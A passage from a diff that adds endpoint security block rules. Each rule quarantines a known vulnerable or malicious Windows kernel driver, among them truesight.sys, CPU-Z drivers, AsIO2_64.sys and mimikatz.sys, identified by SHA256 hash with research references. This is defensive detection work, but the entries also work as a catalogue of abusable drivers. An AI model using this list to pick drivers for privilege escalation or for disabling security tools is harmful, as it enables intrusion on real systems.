"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155841Z", + "creation_date": "2026-03-23T11:45:31.155843Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155848Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d2677a15c494668bf73dcc0849de41ee79e3b782d51ac04a2542a00933d09ff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc705fbb-0953-514e-8f71-d3bcd4ddce67", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610529Z", + "creation_date": "2026-03-23T11:45:29.610531Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610536Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6befa481e8cca8084d9ec3a1925782cd3c28ef7a3e4384e034d48deaabb96b63", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc80852c-1cf6-571c-93f0-3b9fe3f8ae00", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830669Z", + "creation_date": "2026-03-23T11:45:30.830672Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830677Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd3fdc5c338e21e8d8fd9d586fabfdb9fec312f3852bb278fe87ef64d05f78d6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc92cf50-8182-5dc8-a553-174219eeebef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462440Z", + "creation_date": "2026-03-23T11:45:30.462443Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462452Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "51141c22e37d651703dd57cfda018ff06a0175a78e7c72f8ad733a281721716a", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc92f795-d840-53fa-bc9d-821cbab77b7e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621720Z", + "creation_date": "2026-03-23T11:45:29.621722Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621728Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "923ebbe8111e73d5b8ecc2db10f8ea2629a3264c3a535d01c3c118a3b4c91782", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc96a0ad-c4e5-5ef4-9dec-6855d0425773", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480082Z", + "creation_date": "2026-03-23T11:45:30.480084Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480089Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37022838c4327e2a5805e8479330d8ff6f8cd3495079905e867811906c98ea20", + "comment": "Vulnerable Kernel Driver (aka stdcdrv64sys.sys) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fca72425-70e1-5931-90ff-bc4ce2f3bcc9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475044Z", + "creation_date": "2026-03-23T11:45:30.475047Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475057Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e3d9b90e2a1a6e997dd3e3ed6b05aa3230d8ca3c25477b847dbe163c0367cc7e", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fcaf0b25-ff9b-5e21-97e3-a2cd820b7487", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148096Z", + "creation_date": "2026-03-23T11:45:31.148098Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148103Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad25321c6d5d453f61877d4518ff9dd0f0f9c46b11f91743441dedb36075844c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fcb41e68-7090-5703-a079-d66b45301a9d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819571Z", + "creation_date": "2026-03-23T11:45:31.819574Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819582Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ccb06410b63db03f5b8f86a99dca017b8a6f4ac8917e3e7b628d7a7ade9f813c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fcb70074-4888-59d1-96cc-738a6e94bfe4", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479539Z", + "creation_date": "2026-03-23T11:45:31.479543Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479553Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b66ad8c72063d4a3cc34aaa8cfee8dd7489880e2d369b1ed4ccc5cbea86c2bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fcb84375-1445-52b9-a0de-0797e6164ca1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985082Z", + "creation_date": "2026-03-23T11:45:29.985084Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.985089Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21", + "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fcba455e-e89e-5077-bc0b-25f9a8ff3ec7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825669Z", + "creation_date": "2026-03-23T11:45:30.825671Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825677Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a87cbd4cdb3261b10539c2611d69ae66ee38eb83b2d6ffdfe832e348f8a543ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fcbfa754-e04a-5333-b166-732dea479ae2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486263Z", + "creation_date": "2026-03-23T11:45:31.486267Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486276Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb576807ce3385d1007d8d6aa6cd6c54c946eb78ec947d67cefe8fab58e99e26", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fcca48bc-3cbd-5d7d-9b48-b4c82b84c248", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811435Z", + "creation_date": "2026-03-23T11:45:31.811437Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811443Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"72d17c16571c89cf3c7d1c48cf590e16704dc1758c4d6b9d3172cedae957e6fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fccfad40-c74b-531d-95c1-0a11cb615acd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621794Z", + "creation_date": "2026-03-23T11:45:29.621796Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621801Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a7bb08f99a9701482ce693d71e95559b10a247c4e8f50deba8097b0d3f191532", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fcd23c3c-477b-5ef1-8309-05c5087575af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, 
+ "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456752Z", + "creation_date": "2026-03-23T11:45:30.456755Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456764Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "faa9aa7118ecf9bb6594281f6b582f1ced0cc62d5db09a2fbf9b7ce70c532285", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fcdbc473-378e-539f-8bd4-3758805f1c44", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159349Z", + "creation_date": "2026-03-23T11:45:31.159351Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159356Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e3739737765880d445f9a5b1dcfc6f5e8832e01738724f2c003b67226faf3823", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fcdfd4fc-513f-5bbe-b465-1b84f78302cb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815574Z", + "creation_date": "2026-03-23T11:45:30.815589Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815603Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "903d6d71da64566b1d9c32d4fb1a1491e9f91006ad2281bb91d4f1ee9567ef7b", + "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fceb7018-587a-596f-a52c-e45e343d5424", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481097Z", + "creation_date": "2026-03-23T11:45:30.481099Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481105Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf370bf2ef3fb6fd5e9722bad8af5347b74ce7252d291e2958b365aad1b0bb76", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fcf105c6-9ca9-5e21-aa70-a52475b2dda0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808468Z", + "creation_date": "2026-03-23T11:45:31.808470Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808476Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "002744572989f91fd5edf800ffc6baefeea877eca3b8d7c9abbfa5e29b1b3b5e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fcf64e10-0548-58e4-b36f-2e272fc54e6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160100Z", + "creation_date": "2026-03-23T11:45:31.160102Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160108Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "80f793cd949b16335e835de748c5d15ca945c72c0cef50371ae80f931805b206", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd065efe-8ffc-5cc7-accc-40f56dce9e7f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487236Z", + "creation_date": "2026-03-23T11:45:31.487238Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487244Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "3943991d2624914a5f8c16d7f4060601e4c09f1eae37e0dd13616e1ff53493a7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd0b387f-056e-5f2c-beee-38eace13fd4f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140601Z", + "creation_date": "2026-03-23T11:45:31.140603Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140608Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "46b35f77b7c6dfbafe431538b4b790bb4f709ae3dcbb8e24023809805b31b9d4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd129ccd-f4bc-5f7a-b475-71cbe3c09e78", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498388Z", + "creation_date": "2026-03-23T11:45:31.498392Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498400Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "067748aeeb35971ba770bf2cd652eef93add635e5228a76b0a2c815d483f520d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fd21c610-3d7e-53b0-afd5-054e7746aabe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142629Z", + "creation_date": "2026-03-23T11:45:31.142631Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142636Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd51b2f62eb091d20bd898a9680b6c55f37920e9026142d604e5fd0a2698013d", + "comment": 
